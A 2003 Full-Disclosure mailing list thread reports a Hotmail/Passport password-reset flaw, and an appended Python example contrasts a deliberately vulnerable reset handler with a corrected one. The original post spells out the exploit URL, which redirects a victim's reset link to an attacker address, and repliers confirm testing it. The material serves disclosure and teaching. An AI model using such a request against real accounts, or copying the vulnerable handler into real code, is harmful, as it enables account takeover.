Message-ID: <02c401c31523$30024680$e04f7780@ttol>
From: WChang at pnwsoft.com (Wayne Chang (Pacific Northwest Software))
Subject: Hotmail & Passport (.NET Accounts) Vulnerability

I just tried this (with permission from the email owners).  It worked on all
occasions.

Wayne Chang
Pacific Northwest Software
----- Original Message -----
From: "Christopher F. Herot" <cherot@...liedmessaging.com>
To: <mfrd@...itudex.com>; <full-disclosure@...ts.netsys.com>
Sent: Thursday, May 08, 2003 12:05 AM
Subject: RE: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability


>
> I just tried this.  It does indeed generate the "reset password" email
> and link, which is scary, but following the instructions does not really
> reset the password, at least not for the limited test I performed.
>
>
> > -----Original Message-----
> > From: Muhammad Faisal Rauf Danka [mailto:mfrd@...itudex.com]
> > Sent: Wednesday, May 07, 2003 10:51 PM
> > To: full-disclosure@...ts.netsys.com
> >
> > Hotmail & Passport (.NET Accounts) Vulnerability
> >
> > There is a very serious and stupid vulnerability or bad coding in Hotmail / Passport's (.NET
> > Accounts)
> >
> > I tried sending emails several times to Hotmail / Passport contact addresses, but always met with
> > the NLP bots.
> >
> > I guess I don't need to go in details of how crucial and important Hotmail / Passport's .NET
> > Account passport is to anyone.
> >
> > You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues,
> > Corporate Espionage, maybe stalkers and what not.
> >
> > It is so simple that it is funny.
> >
> > All you got to do is hit the following in your browser:
> >
> >
> > https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@...acker.com&rst=1
> >
> > And you'll get an email on attacker@...acker.com asking you to click on a url something like this:
> >
> >
> > http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033
> >
> > From that url, you can reset the password and I don't think I need to say anything more about it.
> >
> > Vulnerability / Flaw discovered : 12th April 2003
> > Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned)
> >
> >
> > Regards
> > --------
> > Muhammad Faisal Rauf Danka
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
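
The reset flow reported in this thread, shown beside a corrected handler. This is an added example, not part of the original messages and not the vendor's code. It assumes the server used the request's `prefem` value as the delivery address for the reset link, which is the behaviour the post reports; the account store, addresses, host and function names are constructed for illustration.

```python
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed account store: login address -> recovery address on record.
ACCOUNTS = {"user@example.com": "recovery@example.net"}

GENERIC_REPLY = "If the account exists, a reset link has been sent."


def _params(url):
    """Return the query string as a flat dict (first value per key)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {key: values[0] for key, values in query.items()}


def reset_recipient_vulnerable(url):
    """Assumed flawed logic: the reset link goes wherever the request says."""
    p = _params(url)
    if p.get("em") not in ACCOUNTS:
        return None
    # Client-controlled 'prefem' overrides the address on record.
    return p.get("prefem") or ACCOUNTS[p["em"]]


def reset_recipient_hardened(url):
    """Corrected logic: only the stored recovery address is ever used."""
    p = _params(url)
    account = p.get("em", "").strip().lower()
    # 'prefem' and every other request field are ignored for delivery.
    return ACCOUNTS.get(account)


def issue_reset(url, outbox):
    """Queue a single-use token for the address on record, if any.

    The reply is identical for known and unknown accounts, so the
    endpoint does not reveal which addresses are registered.
    """
    recipient = reset_recipient_hardened(url)
    if recipient is not None:
        outbox.append((recipient, secrets.token_urlsafe(32)))
    return GENERIC_REPLY


# Constructed request in the shape quoted in the post (placeholder host).
SAMPLE = ("https://idp.example/reset?lc=1033&em=user@example.com"
          "&id=&cb=&prefem=other@example.org&rst=1")
```
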

